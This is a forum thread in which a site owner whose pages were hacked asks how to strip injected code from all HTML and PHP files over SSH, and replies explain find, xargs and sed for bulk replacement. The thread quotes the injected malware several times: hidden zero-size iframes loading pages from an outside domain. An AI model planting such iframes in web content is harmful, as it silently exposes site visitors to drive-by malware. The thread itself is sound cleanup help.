• 0

SSH Find/Replace Command Line


Question

I just got SSH enabled on my server, I logged in using WinSCP. Is there a command line I can put to find and delete or find and replace a single line of code in ALL of my html and php pages?

This is the the line I need to delete (my account was hacked). I want to delete it if possible...

<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Link to comment
https://www.neowin.net/forum/topic/825136-ssh-findreplace-command-line/
Share on other sites

16 answers to this question

Recommended Posts

  • 0
  djkk786 said:
Rudy,

My client doesn't have an option (on Windows) to find/replace.

kjordan2001

I am completely new to SSH so I'm not sure what do you mean by 'sed' ?

It's a commandline program.

# sed -i -e 's@test@test2@g' myfile

Would replace all instances (the g at the end for global) of test with test2 in myfile.

  • 0

You could do something like have winscp open all your files in notepad++ (select the infected files, edit them, should open up in notepad++), then in notepad++ find and replace in all the files you've opened up. Save them, and they get uploaded

I am pretty winscp does that, and that would be one way

  • 0

Hmm, Thing is I have over 6GB of data on the sever so downloading them all then re-uploading them is the last option I want to try.

kjordan, the program commandline you provided, does that work only for one file at a time or can it run through my entire directory/sub-directories and replace everything?

  • 0

Sed will work on a single file by default but you can feed it the results of a find command to make it traverse entire drives if you want to.

Here's a demo video.

Command in question is:

find . -name "*.txt" | xargs sed -i .old -e "s/howdy/hello/g"

That'll swap out "howdy" with "hello" in all text files in the current directory and sub-directories.

it will store backups in place with .old extensions just in case things all go wrong too - probably a good idea because you're editing live on the server rather than using a version control system + push/pull updates.

  • 0

evn,

The code you provided the quote has "s/howdy/hello/g" but what I want to replace has a back slash ( / ) in it (as mentioned above), would this still work? I believe the command line you mentioned would work for a single word but not for a long line of html code unless if I'm wrong.

  • 0
  djkk786 said:
Thanks, i'll give that a try.

Did you get it to work? I also got the same hack and all my .html files on my website had that string added to it. I ran a command to see all the files that were modified but I dont know how to run a command to have all those files fixed.

  • 0

I am trying this command

find . -name "*.html" | xargs sed -i .old -e "s/\iframe src="http:\\reycross.com\lib\index.php\ width=0 height=0 style=\hidden\ frameborder=0 marginheight=0 marginwidth=0 scrolling=no\\\iframe>/./g"

This is whats been added to all my html files

<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Is that code correct? I am not sure what I am doing

  • 0

this following code worked

find . -name "*.html" | xargs sed -i .old -e "s/<iframe src=\"http:\/\/reycross.com\/lib\/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>/./g"

thanks for pointing me in the right direction.

  • 0

I have to replace "motallyTrack($motally_params);" with "//motallyTrack($motally_params);"

in the "functions.php" file in all /var/www/html/ folders.

that is my command line:

find . -name "functions.php" | xargs sed -i .old -e "s/motallyTrack\(\$motally\_params\)/\/\/motallyTrack\(\$motally\_params\)/g"

I receive the following error msg:

  Quote
sed: can't read .old: No such file or directory

sed: can't read ./oig_tmp/phpc/plugins/Page: No such file or directory

sed: can't read Counts.php: No such file or directory

sed: can't read ./oig_tmp/phpc/plugins/Browsers: No such file or directory

sed: can't read (Graphical).php: No such file or directory

  • 0
  On 19/09/2009 at 00:04, Colin-uk said:

you could use something like grep with find to search for all the files containing that string, probly need to use a complicated regex string tho :p

That's one huge regex Colin... by time you've worked that out you could've done it manually :p

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Gemini CLI brings AI smarts to your Firebase terminal experience by Paul Hill Google has added its Gemini AI model directly into the command-line interface of Firebase Studio, its cloud-based IDE that uses AI to help with projects. The Gemini Command Line Interface (CLI) means that developers can expand past using AI for code, they can now also use AI for content generation and research without leaving the IDE. Gemini CLI comes with free usage tiers (60 model requests per minute, 1,000 requests per day with a Google login), it offers advanced AI features, and includes integrated Google Search for real-time content. Gemini CLI is also open source so it can be customized and accepts contributions. Accessing the Gemini CLI within Firebase Studio is straightforward, just press “Code view” in the top-right. From there, open up the terminal from the burger menu then select Terminal and New Terminal. Then in the terminal, type gemini and go through the setup, you can just press enter twice to get started. Out of the box, you’ll be able to get started with Gemini 2.5 Pro by just typing a query and pressing enter. There is also a non-interactive mode that’s useful for scripting and automation. To use it you use the –prompt or -p flags followed by your query wrapped in quotes, for example: gemini -p “What is the capital of France?” In this mode, Gemini CLI automatically closes after completing the request. During setup, there was the option to choose a theme. If you ever want to change it or look at other settings such as usage states, tool access, or checkpointing, you can edit them via .gemini/settings.json. You can also add API keys or choose different models in .env and you can using GEMINI.md to provide project-specific context, instructions, and coding styles in Gemini for a more tailored response. With Gemini CLI, you can have it explain code, refactor code, debug errors, and summarize information. It’s as simple as typing explain [file], refactor , debug “Error message”, or summarize “topic”. There are also built-in commands for managing the session such as /help for a command list, /chat to save and resume conversations, /tools to see available tools, and /restore to undo tool-made file edits. Firebase Studio, in true Google fashion, is a cloud-based IDE used in your web browser, making it excellent for weaker computers. To get started, you can head to the Firebase website. From there, tap Studio in the top-right.
    • I would prefer local ai over online ai on some tasks . They are good enough for tasks like artificial voice , image editing , text corrections , tagging etc . Local AI on Windows Photo editor is impressive for example . There are probably many other Ai that we could run on simple pc with GPUs .
    • oh look, we are under the control of the U.S again, is it not about time we as a country did this ourselves if they want it, not rely on greedy U.S. tech companies? We are capable of doing so as a country. I hate how the U.K have gone with no industry like we used to have and relying on other countries. Maybe we should follow Trump words, and make Britain great again and stop bending over to please Trump and other countries. Our government is Trumps puppet. I know we need to co-operate on some things, but come on.
    • Actually I see no problem is notifying readers in advance. The post author mentioned that it'll be available on July 22.
    • We can actually disable this new AI powered tab groups suggestion feature. https://www.askvg.com/enable-o...mart-tab-groups-in-firefox/
  • Recent Achievements

    • Week One Done
      MIghty Haul earned a badge
      Week One Done
    • One Month Later
      MIghty Haul earned a badge
      One Month Later
    • Collaborator
      KD2004 earned a badge
      Collaborator
    • One Month Later
      ataho31016 earned a badge
      One Month Later
    • One Month Later
      Delahenty Machinery earned a badge
      One Month Later
  • Popular Contributors

    1. 1
      +primortal
      593
    2. 2
      Michael Scrip
      201
    3. 3
      ATLien_0
      192
    4. 4
      +FloatingFatMan
      140
    5. 5
      Xenon
      127
  • Tell a friend

    Love Neowin? Tell a friend!